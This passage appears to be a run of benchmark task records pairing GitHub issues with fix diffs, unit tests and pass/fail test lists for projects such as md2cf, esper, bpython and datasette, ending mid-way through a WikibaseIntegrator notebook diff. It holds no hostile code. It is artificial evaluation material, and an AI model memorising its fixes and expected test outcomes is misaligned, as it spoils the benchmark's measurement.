"tests/test_fairworkflow.py::TestFairWorkflow::test_iterator",
"tests/test_fairworkflow.py::TestFairWorkflow::test_iterator_one_step",
"tests/test_fairworkflow.py::TestFairWorkflow::test_iterator_sorting_failed",
"tests/test_fairworkflow.py::TestFairWorkflow::test_draw_without_graphviz_module",
"tests/test_fairworkflow.py::TestFairWorkflow::test_display_rdf_without_graphviz_module",
"tests/test_fairworkflow.py::TestFairWorkflow::test_publish_as_nanopub_no_modifications",
"tests/test_fairworkflow.py::TestFairWorkflow::test_workflow_construction_and_execution",
"tests/test_fairworkflow.py::TestFairWorkflow::test_workflow_complex_serialization",
"tests/test_fairworkflow.py::TestFairWorkflow::test_workflow_non_decorated_step",
"tests/test_fairworkflow.py::TestFairWorkflow::test_workflow_mixed_decorated_steps"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_issue_reference",
"has_added_files",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-02-16 12:47:16+00:00
|
apache-2.0
| 2,247
|
|
iamjackg__md2cf-97
|
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 3614043..a26d632 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,10 @@ All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
+## Unreleased
+### Fixed
+- Local section links are no longer rendered as broken relative links (e.g. `[this section](#section-header)`)
+
## 2.2.0 - 2023-07-08
### Added
- Relative links support section headers (@jimstein3d)
diff --git a/md2cf/confluence_renderer.py b/md2cf/confluence_renderer.py
index 5829fa2..74b3496 100644
--- a/md2cf/confluence_renderer.py
+++ b/md2cf/confluence_renderer.py
@@ -105,8 +105,10 @@ class ConfluenceRenderer(mistune.Renderer):
def link(self, link, title, text):
parsed_link = urlparse(link)
- if self.enable_relative_links and (
- not parsed_link.scheme and not parsed_link.netloc
+ if (
+ self.enable_relative_links
+ and (not parsed_link.scheme and not parsed_link.netloc)
+ and parsed_link.path
):
# relative link
replacement_link = f"md2cf-internal-link-{uuid.uuid4()}"
|
iamjackg/md2cf
|
1572ed3c4ecf849b8602d25b733852338f131baf
|
diff --git a/test_package/unit/test_renderer.py b/test_package/unit/test_renderer.py
index 40c50fc..1ab9596 100644
--- a/test_package/unit/test_renderer.py
+++ b/test_package/unit/test_renderer.py
@@ -1,3 +1,7 @@
+import re
+
+import pytest
+
from md2cf.confluence_renderer import ConfluenceRenderer, ConfluenceTag
@@ -263,3 +267,93 @@ def test_renderer_remove_text_newlines():
renderer = ConfluenceRenderer(remove_text_newlines=True)
assert renderer.text(test_text) == test_stripped_text
+
+
+@pytest.mark.parametrize("relative_links", [False, True])
+def test_renderer_normal_link(relative_links):
+ renderer = ConfluenceRenderer(enable_relative_links=relative_links)
+
+ assert (
+ renderer.link(link="https://example.com", text="example link", title=None)
+ == '<a href="https://example.com">example link</a>'
+ )
+
+
+@pytest.mark.parametrize("relative_links", [False, True])
+def test_renderer_local_header_link(relative_links):
+ renderer = ConfluenceRenderer(enable_relative_links=relative_links)
+
+ assert (
+ renderer.link(link="#header-name", text="example link", title=None)
+ == '<a href="#header-name">example link</a>'
+ )
+
+
+def test_renderer_relative_link_enabled():
+ renderer = ConfluenceRenderer(enable_relative_links=True)
+
+ relative_link_regex = re.compile(
+ r"<a href=\"md2cf-internal-link-([-a-z0-9]+)\">relative link</a>"
+ )
+ temporary_link = renderer.link(
+ link="document/../path/page.md", text="relative link", title=None
+ )
+ assert relative_link_regex.match(temporary_link)
+ assert len(renderer.relative_links) == 1
+ relative_link = renderer.relative_links[0]
+
+ assert relative_link.path == "document/../path/page.md"
+ assert (
+ relative_link.replacement == f"md2cf-internal-link-"
+ f"{relative_link_regex.match(temporary_link).groups(1)[0]}"
+ )
+ assert relative_link.fragment == ""
+ assert relative_link.original == "document/../path/page.md"
+ assert relative_link.escaped_original == "document/../path/page.md"
+
+
+def test_renderer_relative_link_with_fragment_enabled():
+ renderer = ConfluenceRenderer(enable_relative_links=True)
+
+ relative_link_regex = re.compile(
+ r"<a href=\"md2cf-internal-link-([-a-z0-9]+)\">relative link</a>"
+ )
+ temporary_link = renderer.link(
+ link="document/../path/page.md#header-name", text="relative link", title=None
+ )
+ assert relative_link_regex.match(temporary_link)
+ assert len(renderer.relative_links) == 1
+ relative_link = renderer.relative_links[0]
+
+ assert relative_link.path == "document/../path/page.md"
+ assert (
+ relative_link.replacement == f"md2cf-internal-link-"
+ f"{relative_link_regex.match(temporary_link).groups(1)[0]}"
+ )
+ assert relative_link.fragment == "header-name"
+ assert relative_link.original == "document/../path/page.md#header-name"
+ assert relative_link.escaped_original == "document/../path/page.md#header-name"
+
+
+def test_renderer_relative_link_disabled():
+ renderer = ConfluenceRenderer(enable_relative_links=False)
+
+ assert (
+ renderer.link(link="document/../path/page.md", text="relative link", title=None)
+ == '<a href="document/../path/page.md">relative link</a>'
+ )
+ assert renderer.relative_links == []
+
+
+def test_renderer_relative_link_with_fragment_disabled():
+ renderer = ConfluenceRenderer(enable_relative_links=False)
+
+ assert (
+ renderer.link(
+ link="document/../path/page.md#header-name",
+ text="relative link",
+ title=None,
+ )
+ == '<a href="document/../path/page.md#header-name">relative link</a>'
+ )
+ assert renderer.relative_links == []
|
Link parsing fails for document references
Hi,
I just noticed that it's no longer possible to use `md2cf` with document references like a table of contents, since the relative-path detector treats paths that start with `#` as relative links
```md
[Frequently Asked Questions](#frequently-asked-questions-osep)
```
Having something like this in the document results in
```
Page test.md has a relative link to , which is not in the list of pages to be uploaded.
```
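For context, the fix distinguishes pure fragment links from genuine relative links by also requiring a non-empty path. A minimal standalone sketch of that condition (not the actual renderer code):

```python
from urllib.parse import urlparse

for link in ["#frequently-asked-questions-osep", "docs/page.md#header", "https://example.com"]:
    p = urlparse(link)
    # only treat as a relative file link when there is no scheme/netloc AND a non-empty path
    is_relative_file_link = (not p.scheme and not p.netloc) and bool(p.path)
    print(link, "->", "relative file link" if is_relative_file_link else "left as-is")
```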
|
0.0
|
1572ed3c4ecf849b8602d25b733852338f131baf
|
[
"test_package/unit/test_renderer.py::test_renderer_local_header_link[True]"
] |
[
"test_package/unit/test_renderer.py::test_add_namespace",
"test_package/unit/test_renderer.py::test_tag_append",
"test_package/unit/test_renderer.py::test_tag_render",
"test_package/unit/test_renderer.py::test_tag_render_with_text",
"test_package/unit/test_renderer.py::test_tag_render_with_cdata_text",
"test_package/unit/test_renderer.py::test_tag_render_with_attribute",
"test_package/unit/test_renderer.py::test_tag_render_with_multiple_attributes",
"test_package/unit/test_renderer.py::test_tag_render_with_child",
"test_package/unit/test_renderer.py::test_tag_render_with_child_and_text",
"test_package/unit/test_renderer.py::test_renderer_reinit",
"test_package/unit/test_renderer.py::test_renderer_block_code",
"test_package/unit/test_renderer.py::test_renderer_block_code_with_language",
"test_package/unit/test_renderer.py::test_renderer_header_sets_title",
"test_package/unit/test_renderer.py::test_renderer_strips_header",
"test_package/unit/test_renderer.py::test_renderer_header_lower_level_does_not_set_title",
"test_package/unit/test_renderer.py::test_renderer_header_later_level_sets_title",
"test_package/unit/test_renderer.py::test_renderer_header_only_sets_first_title",
"test_package/unit/test_renderer.py::test_renderer_image_external",
"test_package/unit/test_renderer.py::test_renderer_image_external_alt_and_title",
"test_package/unit/test_renderer.py::test_renderer_image_internal_absolute",
"test_package/unit/test_renderer.py::test_renderer_image_internal_relative",
"test_package/unit/test_renderer.py::test_renderer_remove_text_newlines",
"test_package/unit/test_renderer.py::test_renderer_normal_link[False]",
"test_package/unit/test_renderer.py::test_renderer_normal_link[True]",
"test_package/unit/test_renderer.py::test_renderer_local_header_link[False]",
"test_package/unit/test_renderer.py::test_renderer_relative_link_enabled",
"test_package/unit/test_renderer.py::test_renderer_relative_link_with_fragment_enabled",
"test_package/unit/test_renderer.py::test_renderer_relative_link_disabled",
"test_package/unit/test_renderer.py::test_renderer_relative_link_with_fragment_disabled"
] |
{
"failed_lite_validators": [
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2023-07-17 15:33:37+00:00
|
mit
| 2,789
|
|
benmoran56__esper-81
|
diff --git a/esper/__init__.py b/esper/__init__.py
index c67b5dd..5ac17a7 100644
--- a/esper/__init__.py
+++ b/esper/__init__.py
@@ -215,6 +215,9 @@ class World:
entity = self._next_entity_id
+ if entity not in self._entities:
+ self._entities[entity] = {}
+
for component_instance in components:
component_type = type(component_instance)
@@ -224,9 +227,6 @@ class World:
self._components[component_type].add(entity)
- if entity not in self._entities:
- self._entities[entity] = {}
-
self._entities[entity][component_type] = component_instance
self.clear_cache()
@@ -314,9 +314,6 @@ class World:
self._components[component_type].add(entity)
- if entity not in self._entities:
- self._entities[entity] = {}
-
self._entities[entity][component_type] = component_instance
self.clear_cache()
|
benmoran56/esper
|
c413eccd6eae12556d0fbad48298f259b6c7ea7b
|
diff --git a/tests/test_world.py b/tests/test_world.py
index 8af332f..126102c 100644
--- a/tests/test_world.py
+++ b/tests/test_world.py
@@ -39,6 +39,11 @@ def test_create_entity_with_components(world):
assert world.has_component(entity2, ComponentB) is True
+def test_adding_component_to_not_existing_entity_raises_error(world):
+ with pytest.raises(KeyError):
+ world.add_component(123, ComponentA())
+
+
def test_create_entity_and_add_components(world):
entity1 = world.create_entity()
world.add_component(entity1, ComponentA())
@@ -59,18 +64,17 @@ def test_delete_entity(world):
world.add_component(entity1, ComponentC())
entity2 = world.create_entity()
world.add_component(entity2, ComponentD())
- entity3 = world.create_entity()
- world.add_component(entity3, ComponentE())
- entity4 = world.create_entity()
+ entity_with_component = world.create_entity()
+ world.add_component(entity_with_component, ComponentE())
+ empty_entity = world.create_entity()
- assert entity3 == 3
- world.delete_entity(entity3, immediate=True)
+ assert entity_with_component == 3
+ world.delete_entity(entity_with_component, immediate=True)
with pytest.raises(KeyError):
- world.components_for_entity(entity3)
+ world.components_for_entity(entity_with_component)
with pytest.raises(KeyError):
world.delete_entity(999, immediate=True)
- with pytest.raises(KeyError):
- world.delete_entity(entity4, immediate=True)
+ world.delete_entity(empty_entity, immediate=True)
def test_component_for_entity(world):
@@ -256,17 +260,22 @@ def test_cache_results(world):
assert len(list(query for query in world.get_components(ComponentB, ComponentC))) == 1
-def test_entity_exists(world):
- dead_entity = world.create_entity(ComponentB())
- world.delete_entity(dead_entity)
- empty_entity = world.create_entity()
- existent_entity = world.create_entity(ComponentA())
- future_entity = existent_entity + 1
+class TestEntityExists:
+ def test_dead_entity(self, world):
+ dead_entity = world.create_entity(ComponentB())
+ world.delete_entity(dead_entity)
+ assert not world.entity_exists(dead_entity)
+
+ def test_not_created_entity(self, world):
+ assert not world.entity_exists(123)
+
+ def test_empty_entity(self, world):
+ empty_entity = world.create_entity()
+ assert world.entity_exists(empty_entity)
- assert world.entity_exists(existent_entity)
- assert not world.entity_exists(dead_entity)
- assert not world.entity_exists(empty_entity)
- assert not world.entity_exists(future_entity)
+ def test_entity_with_component(self, world):
+ entity_with_component = world.create_entity(ComponentA())
+ assert world.entity_exists(entity_with_component)
def test_event_dispatch_no_handlers():
|
`World().create_entity()` does not create entity if no components are given
**Describe the bug**
As a factory method, I assume it always creates an entity, but that does not happen in the edge case where no components are given.
**To Reproduce**
```python3
import esper
world = esper.World()
entity = world.create_entity()
assert world.entity_exists(entity) # raises AssertionError
```
```python3
import esper
world = esper.World()
entity = world.create_entity()
assert not world.entity_exists(entity) # not existing entity
entity_2 = world.create_entity()
assert entity_2 == 2 # Incrementing counter even though 1st one seems not to exist
```
**Expected behavior**
Imo the proper behaviour is to be able to create an "empty" entity and provide it with components later, kind of like with the builder pattern.
Plus, I've found that `add_component()` has logic for creating a missing entity, which is most probably a result of that bug. Following the Single Responsibility Principle, that should not be part of the `add_component()` method imo. See the example below:
```python3
import esper
world = esper.World()
made_up_entity = 123
world.add_component(made_up_entity, None) # Imo should raise KeyError because of missing entity
world.entity_exists(made_up_entity) # Works just fine and should not
```
**Development environment:**
- Python 3.11
- Esper 2.4
**Fix proposal**
To fix that, it is simple enough to pull https://github.com/benmoran56/esper/blob/master/esper/__init__.py#L227
```python3
if entity not in self._entities:
self._entities[entity] = {}
```
out of the for loop in the `create_entity()` method.
Consider removing entity creation from the `add_component()` method.
Tell me what you think about it; I can implement the change and unit tests later on.
|
0.0
|
c413eccd6eae12556d0fbad48298f259b6c7ea7b
|
[
"tests/test_world.py::test_adding_component_to_not_existing_entity_raises_error",
"tests/test_world.py::test_delete_entity",
"tests/test_world.py::TestEntityExists::test_empty_entity"
] |
[
"tests/test_world.py::test_world_instantiation",
"tests/test_world.py::test_create_entity",
"tests/test_world.py::test_create_entity_with_components",
"tests/test_world.py::test_create_entity_and_add_components",
"tests/test_world.py::test_create_entity_and_add_components_with_alias",
"tests/test_world.py::test_component_for_entity",
"tests/test_world.py::test_components_for_entity",
"tests/test_world.py::test_has_component",
"tests/test_world.py::test_has_components",
"tests/test_world.py::test_get_component",
"tests/test_world.py::test_get_two_components",
"tests/test_world.py::test_get_three_components",
"tests/test_world.py::test_try_component",
"tests/test_world.py::test_try_components",
"tests/test_world.py::test_clear_database",
"tests/test_world.py::test_add_processor",
"tests/test_world.py::test_remove_processor",
"tests/test_world.py::test_get_processor",
"tests/test_world.py::test_processor_args",
"tests/test_world.py::test_processor_kwargs",
"tests/test_world.py::test_clear_cache",
"tests/test_world.py::test_cache_results",
"tests/test_world.py::TestEntityExists::test_dead_entity",
"tests/test_world.py::TestEntityExists::test_not_created_entity",
"tests/test_world.py::TestEntityExists::test_entity_with_component",
"tests/test_world.py::test_event_dispatch_no_handlers",
"tests/test_world.py::test_event_dispatch_one_arg",
"tests/test_world.py::test_event_dispatch_two_args",
"tests/test_world.py::test_event_dispatch_incorrect_args",
"tests/test_world.py::test_set_methoad_as_handler_in_init",
"tests/test_world.py::test_set_instance_methoad_as_handler"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2023-04-20 11:26:18+00:00
|
mit
| 1,355
|
|
bpython__bpython-691
|
diff --git a/bpython/curtsiesfrontend/manual_readline.py b/bpython/curtsiesfrontend/manual_readline.py
index 35d28f54..223ec9e7 100644
--- a/bpython/curtsiesfrontend/manual_readline.py
+++ b/bpython/curtsiesfrontend/manual_readline.py
@@ -323,7 +323,7 @@ def titlecase_next_word(cursor_offset, line):
return cursor_offset, line # TODO Not implemented
-delete_word_from_cursor_back_re = LazyReCompile(r'\b\w')
+delete_word_from_cursor_back_re = LazyReCompile(r'^|\b\w')
@edit_keys.on('<Esc+BACKSPACE>')
|
bpython/bpython
|
307f855306ae8e0814458026b9fc47c1f25bf357
|
diff --git a/bpython/test/test_manual_readline.py b/bpython/test/test_manual_readline.py
index 4141292d..faf4b585 100644
--- a/bpython/test/test_manual_readline.py
+++ b/bpython/test/test_manual_readline.py
@@ -240,6 +240,12 @@ class TestManualReadline(unittest.TestCase):
"|"],
delete_word_from_cursor_back)
+ self.try_stages_kill([
+ " (( asdf |",
+ " (( |",
+ "|"],
+ delete_word_from_cursor_back)
+
class TestEdits(unittest.TestCase):
|
Option-delete doesn't delete a left paren
On a line like
~~~
>>> (( asdf a sdf
>>> lots of space
~~~
pressing option-delete repeatedly doesn't delete the opening parens or leading spaces.
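A small standalone sketch of why this happens, using the patterns from the patch above (the line content is illustrative):

```python
import re

remaining = "    (( "          # what is left of the line after the words are deleted
old = re.compile(r"\b\w")      # original pattern
new = re.compile(r"^|\b\w")    # patched pattern also matches the start of the line
print([m.start() for m in old.finditer(remaining)])  # [] -> no match, nothing more to delete
print([m.start() for m in new.finditer(remaining)])  # [0] -> can delete back to the start
```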
|
0.0
|
307f855306ae8e0814458026b9fc47c1f25bf357
|
[
"bpython/test/test_manual_readline.py::TestManualReadline::test_delete_word_from_cursor_back"
] |
[
"bpython/test/test_manual_readline.py::TestManualReadline::test_back_word",
"bpython/test/test_manual_readline.py::TestManualReadline::test_backspace",
"bpython/test/test_manual_readline.py::TestManualReadline::test_beginning_of_line",
"bpython/test/test_manual_readline.py::TestManualReadline::test_delete",
"bpython/test/test_manual_readline.py::TestManualReadline::test_delete_from_cursor_back",
"bpython/test/test_manual_readline.py::TestManualReadline::test_delete_from_cursor_forward",
"bpython/test/test_manual_readline.py::TestManualReadline::test_delete_rest_of_word",
"bpython/test/test_manual_readline.py::TestManualReadline::test_delete_word_to_cursor",
"bpython/test/test_manual_readline.py::TestManualReadline::test_end_of_line",
"bpython/test/test_manual_readline.py::TestManualReadline::test_forward_word",
"bpython/test/test_manual_readline.py::TestManualReadline::test_forward_word_empty",
"bpython/test/test_manual_readline.py::TestManualReadline::test_forward_word_end",
"bpython/test/test_manual_readline.py::TestManualReadline::test_forward_word_tabs",
"bpython/test/test_manual_readline.py::TestManualReadline::test_last_word_pos",
"bpython/test/test_manual_readline.py::TestManualReadline::test_last_word_pos_single_word",
"bpython/test/test_manual_readline.py::TestManualReadline::test_left_arrow_at_non_zero",
"bpython/test/test_manual_readline.py::TestManualReadline::test_left_arrow_at_zero",
"bpython/test/test_manual_readline.py::TestManualReadline::test_right_arrow_at_end",
"bpython/test/test_manual_readline.py::TestManualReadline::test_right_arrow_at_non_end",
"bpython/test/test_manual_readline.py::TestManualReadline::test_transpose_character_before_cursor",
"bpython/test/test_manual_readline.py::TestManualReadline::test_transpose_empty_line",
"bpython/test/test_manual_readline.py::TestManualReadline::test_transpose_end_of_line",
"bpython/test/test_manual_readline.py::TestManualReadline::test_transpose_first_character",
"bpython/test/test_manual_readline.py::TestManualReadline::test_transpose_word_before_cursor",
"bpython/test/test_manual_readline.py::TestManualReadline::test_yank_prev_killed_text",
"bpython/test/test_manual_readline.py::TestManualReadline::test_yank_prev_prev_killed_text",
"bpython/test/test_manual_readline.py::TestEdits::test_config",
"bpython/test/test_manual_readline.py::TestEdits::test_functions_with_bad_return_values",
"bpython/test/test_manual_readline.py::TestEdits::test_functions_with_bad_signatures",
"bpython/test/test_manual_readline.py::TestEdits::test_seq"
] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2017-07-08 14:48:58+00:00
|
mit
| 1,426
|
|
simonw__datasette-1736
|
diff --git a/datasette/app.py b/datasette/app.py
index a5330458..b7b84371 100644
--- a/datasette/app.py
+++ b/datasette/app.py
@@ -288,9 +288,12 @@ class Datasette:
self._settings = dict(DEFAULT_SETTINGS, **(settings or {}))
self.renderers = {} # File extension -> (renderer, can_render) functions
self.version_note = version_note
- self.executor = futures.ThreadPoolExecutor(
- max_workers=self.setting("num_sql_threads")
- )
+ if self.setting("num_sql_threads") == 0:
+ self.executor = None
+ else:
+ self.executor = futures.ThreadPoolExecutor(
+ max_workers=self.setting("num_sql_threads")
+ )
self.max_returned_rows = self.setting("max_returned_rows")
self.sql_time_limit_ms = self.setting("sql_time_limit_ms")
self.page_size = self.setting("default_page_size")
@@ -862,6 +865,8 @@ class Datasette:
]
def _threads(self):
+ if self.setting("num_sql_threads") == 0:
+ return {"num_threads": 0, "threads": []}
threads = list(threading.enumerate())
d = {
"num_threads": len(threads),
diff --git a/datasette/database.py b/datasette/database.py
index ba594a8c..44d32667 100644
--- a/datasette/database.py
+++ b/datasette/database.py
@@ -45,6 +45,9 @@ class Database:
self._cached_table_counts = None
self._write_thread = None
self._write_queue = None
+ # These are used when in non-threaded mode:
+ self._read_connection = None
+ self._write_connection = None
if not self.is_mutable and not self.is_memory:
p = Path(path)
self.hash = inspect_hash(p)
@@ -134,6 +137,14 @@ class Database:
return results
async def execute_write_fn(self, fn, block=True):
+ if self.ds.executor is None:
+ # non-threaded mode
+ if self._write_connection is None:
+ self._write_connection = self.connect(write=True)
+ self.ds._prepare_connection(self._write_connection, self.name)
+ return fn(self._write_connection)
+
+ # threaded mode
task_id = uuid.uuid5(uuid.NAMESPACE_DNS, "datasette.io")
if self._write_queue is None:
self._write_queue = queue.Queue()
@@ -177,6 +188,14 @@ class Database:
task.reply_queue.sync_q.put(result)
async def execute_fn(self, fn):
+ if self.ds.executor is None:
+ # non-threaded mode
+ if self._read_connection is None:
+ self._read_connection = self.connect()
+ self.ds._prepare_connection(self._read_connection, self.name)
+ return fn(self._read_connection)
+
+ # threaded mode
def in_thread():
conn = getattr(connections, self.name, None)
if not conn:
diff --git a/docs/settings.rst b/docs/settings.rst
index 60c4b36d..8437fb04 100644
--- a/docs/settings.rst
+++ b/docs/settings.rst
@@ -107,6 +107,8 @@ Maximum number of threads in the thread pool Datasette uses to execute SQLite qu
datasette mydatabase.db --setting num_sql_threads 10
+Setting this to 0 turns off threaded SQL queries entirely - useful for environments that do not support threading such as `Pyodide <https://pyodide.org/>`__.
+
.. _setting_allow_facet:
allow_facet
|
simonw/datasette
|
a29c1277896b6a7905ef5441c42a37bc15f67599
|
diff --git a/tests/test_internals_datasette.py b/tests/test_internals_datasette.py
index cc200a2d..1dc14cab 100644
--- a/tests/test_internals_datasette.py
+++ b/tests/test_internals_datasette.py
@@ -1,7 +1,7 @@
"""
Tests for the datasette.app.Datasette class
"""
-from datasette.app import Datasette
+from datasette.app import Datasette, Database
from itsdangerous import BadSignature
from .fixtures import app_client
import pytest
@@ -63,3 +63,15 @@ async def test_datasette_constructor():
"hash": None,
}
]
+
+
+@pytest.mark.asyncio
+async def test_num_sql_threads_zero():
+ ds = Datasette([], memory=True, settings={"num_sql_threads": 0})
+ db = ds.add_database(Database(ds, memory_name="test_num_sql_threads_zero"))
+ await db.execute_write("create table t(id integer primary key)")
+ await db.execute_write("insert into t (id) values (1)")
+ response = await ds.client.get("/-/threads.json")
+ assert response.json() == {"num_threads": 0, "threads": []}
+ response2 = await ds.client.get("/test_num_sql_threads_zero/t.json?_shape=array")
+ assert response2.json() == [{"id": 1}]
|
Datasette setting to disable threading (for Pyodide)
> I'm going to add a Datasette setting to disable threading entirely, designed for usage in this particular case.
>
> I thought about adding a new setting, then I noticed this:
>
> datasette mydatabase.db --setting num_sql_threads 10
>
> I'm going to let users set that to `0` to disable threaded execution of SQL queries.
_Originally posted by @simonw in https://github.com/simonw/datasette/issues/1733#issuecomment-1115278325_
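A minimal sketch of the setting in use, mirroring the test added in this change (an in-memory Datasette with threading turned off):

```py
from datasette.app import Datasette

# Threading disabled entirely via the existing num_sql_threads setting
ds = Datasette([], memory=True, settings={"num_sql_threads": 0})
```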
|
0.0
|
a29c1277896b6a7905ef5441c42a37bc15f67599
|
[
"tests/test_internals_datasette.py::test_num_sql_threads_zero"
] |
[
"tests/test_internals_datasette.py::test_get_database",
"tests/test_internals_datasette.py::test_get_database_no_argument",
"tests/test_internals_datasette.py::test_sign_unsign[None-hello]",
"tests/test_internals_datasette.py::test_sign_unsign[None-123]",
"tests/test_internals_datasette.py::test_sign_unsign[None-value2]",
"tests/test_internals_datasette.py::test_sign_unsign[two-hello]",
"tests/test_internals_datasette.py::test_sign_unsign[two-123]",
"tests/test_internals_datasette.py::test_sign_unsign[two-value2]",
"tests/test_internals_datasette.py::test_datasette_setting[base_url-/]",
"tests/test_internals_datasette.py::test_datasette_setting[max_csv_mb-100]",
"tests/test_internals_datasette.py::test_datasette_setting[allow_csv_stream-True]",
"tests/test_internals_datasette.py::test_datasette_constructor"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-05-02 20:14:38+00:00
|
apache-2.0
| 5,498
|
|
LeMyst__WikibaseIntegrator-420
|
diff --git a/notebooks/item_create_new.ipynb b/notebooks/item_create_new.ipynb
index d498f68..7ad47bd 100644
--- a/notebooks/item_create_new.ipynb
+++ b/notebooks/item_create_new.ipynb
@@ -35,12 +35,12 @@
},
"outputs": [],
"source": [
- "from wikibaseintegrator.models import Qualifiers, References, Reference\n",
- "\n",
- "from wikibaseintegrator import WikibaseIntegrator\n",
- "from wikibaseintegrator import wbi_login\n",
"from wikibaseintegrator import datatypes\n",
- "from wikibaseintegrator.wbi_config import config"
+ "from wikibaseintegrator import wbi_login\n",
+ "from wikibaseintegrator import WikibaseIntegrator\n",
+ "from wikibaseintegrator.models import Qualifiers, Reference, References\n",
+ "from wikibaseintegrator.wbi_config import config\n",
+ "from wikibaseintegrator.wbi_enums import WikibaseRank, WikibaseSnakType"
]
},
{
@@ -162,7 +162,7 @@
"outputs": [
{
"data": {
- "text/plain": "<LanguageValue @ed5b70 _LanguageValue__language='fr' _LanguageValue__value='Nouvel élément' _LanguageValue__removed=False>"
+ "text/plain": "<LanguageValue @8e3ca0 _LanguageValue__language='fr' _LanguageValue__value='Nouvel élément' _LanguageValue__removed=False>"
},
"execution_count": 6,
"metadata": {},
@@ -198,7 +198,7 @@
"outputs": [
{
"data": {
- "text/plain": "<Aliases @ed4880 _Aliases__aliases={'en': [<Alias @ed56c0 _LanguageValue__language='en' _LanguageValue__value='Item' _LanguageValue__removed=False>], 'fr': [<Alias @ed5ae0 _LanguageValue__language='fr' _LanguageValue__value='Élément' _LanguageValue__removed=False>]}>"
+ "text/plain": "<Aliases @c234c0 _Aliases__aliases={'en': [<Alias @c5ce50 _LanguageValue__language='en' _LanguageValue__value='Item' _LanguageValue__removed=False>], 'fr': [<Alias @c5cca0 _LanguageValue__language='fr' _LanguageValue__value='Élément' _LanguageValue__removed=False>]}>"
},
"execution_count": 7,
"metadata": {},
@@ -234,7 +234,7 @@
"outputs": [
{
"data": {
- "text/plain": "<LanguageValue @ed5750 _LanguageValue__language='fr' _LanguageValue__value='Un élément fraichement créé' _LanguageValue__removed=False>"
+ "text/plain": "<LanguageValue @c5d240 _LanguageValue__language='fr' _LanguageValue__value='Un élément fraichement créé' _LanguageValue__removed=False>"
},
"execution_count": 8,
"metadata": {},
@@ -270,7 +270,7 @@
"outputs": [
{
"data": {
- "text/plain": "<Claims @ed4460 _Claims__claims={'P31533': [<String @ed5ab0 _Claim__mainsnak=<Snak @ed6920 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P31533' _Snak__hash=None _Snak__datavalue={'value': 'A String property', 'type': 'string'} _Snak__datatype='string'> _Claim__type='statement' _Claim__qualifiers=<Qualifiers @ed7370 _Qualifiers__qualifiers={'P828': [<Snak @ed6980 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash=None _Snak__datavalue={'value': 'Item qualifier', 'type': 'string'} _Snak__datatype='string'>]}> _Claim__qualifiers_order=[] _Claim__id=None _Claim__rank=<WikibaseRank.NORMAL: 'normal'> _Claim__removed=False _Claim__references=<References @ed5ff0 _References__references=[<Reference @ed6260 _Reference__hash=None _Reference__snaks=<Snaks @ed68c0 snaks={'P828': [<Snak @ed6aa0 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash=None _Snak__datavalue={'value': 'Item string reference', 'type': 'string'} _Snak__datatype='string'>]}> _Reference__snaks_order=[]>, <Reference @ed69e0 _Reference__hash=None _Reference__snaks=<Snaks @ed6950 snaks={'P828': [<Snak @ed7c40 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash=None _Snak__datavalue={'value': 'Another item string reference', 'type': 'string'} _Snak__datatype='string'>]}> _Reference__snaks_order=[]>]>>]}>"
+ "text/plain": "<Claims @c233a0 _Claims__claims={'P31533': [<String @c5e0b0 _Claim__mainsnak=<Snak @c5f700 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P31533' _Snak__hash=None _Snak__datavalue={'value': 'A String property', 'type': 'string'} _Snak__datatype='string'> _Claim__type='statement' _Claim__qualifiers=<Qualifiers @c5f820 _Qualifiers__qualifiers={'P828': [<Snak @c5dc00 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash=None _Snak__datavalue={'value': 'Item qualifier', 'type': 'string'} _Snak__datatype='string'>]}> _Claim__qualifiers_order=[] _Claim__id=None _Claim__rank=<WikibaseRank.PREFERRED: 'preferred'> _Claim__removed=False _Claim__references=<References @c5e140 _References__references=[<Reference @c5fa00 _Reference__hash=None _Reference__snaks=<Snaks @c5da50 snaks={'P828': [<Snak @c5dd20 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash=None _Snak__datavalue={'value': 'Item string reference', 'type': 'string'} _Snak__datatype='string'>]}> _Reference__snaks_order=[]>, <Reference @c5dc60 _Reference__hash=None _Reference__snaks=<Snaks @c5dbd0 snaks={'P828': [<Snak @c5f5b0 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash=None _Snak__datavalue={'value': 'Another item string reference', 'type': 'string'} _Snak__datatype='string'>]}> _Reference__snaks_order=[]>, <Reference @c5e0e0 _Reference__hash=None _Reference__snaks=<Snaks @c5dba0 snaks={'P828': [<Snak @c5f730 _Snak__snaktype=<WikibaseSnakType.NO_VALUE: 'novalue'> _Snak__property_number='P828' _Snak__hash=None _Snak__datavalue={} _Snak__datatype='string'>]}> _Reference__snaks_order=[]>]>>], 'P3133': [<String @c5f580 _Claim__mainsnak=<Snak @c5f6d0 _Snak__snaktype=<WikibaseSnakType.UNKNOWN_VALUE: 'somevalue'> _Snak__property_number='P3133' _Snak__hash=None _Snak__datavalue={} _Snak__datatype='string'> _Claim__type='statement' _Claim__qualifiers=<Qualifiers @c5f610 _Qualifiers__qualifiers={}> _Claim__qualifiers_order=[] _Claim__id=None _Claim__rank=<WikibaseRank.NORMAL: 'normal'> _Claim__removed=False _Claim__references=<References @c5f7c0 _References__references=[]>>]}>"
},
"execution_count": 9,
